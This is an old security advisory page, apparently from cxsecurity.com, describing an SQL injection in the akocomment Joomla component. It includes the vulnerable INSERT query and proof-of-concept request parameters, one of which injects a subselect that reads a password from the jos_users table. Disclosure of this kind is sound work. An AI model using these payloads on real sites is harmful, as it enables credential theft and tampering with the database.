akocomment SQL INJECTION (all version)

2007.07.09
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

$query2 = "INSERT INTO #__akocomment SET parentid='$acparentid', contentid='$contentid', ip='$ip', name='$acname', title='$title', comment='$comment', date='$date', published='$ac_autopublish';"; there are two SQL injection. POC: <INPUT TYPE='hidden' NAME='acitemid' value='9'><INPUT TYPE='hidden' NAME='acparentid' value=''><INPUT TYPE='hidden' NAME='contentid' value='633'> acparentid=633 e acitemid=9 option=com_akocomment&acitemid=9&acparentid=&contentid=633&func=entry&ac name=Visitatore&title=aa&comment=af&hid_security_word=db17bc578c383f5bb0 cb9be70c42331c&security_word=dsq option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c &security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1' ,name='test',title='titolo',comment='commento',date=0,published=1/* option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c &security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1' ,name=(select top 1 password from jos_users),title='titulo',comment='commento',date=0,published=1/* it work only for magic quotes are off. alpha fix: enable magic quotes.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top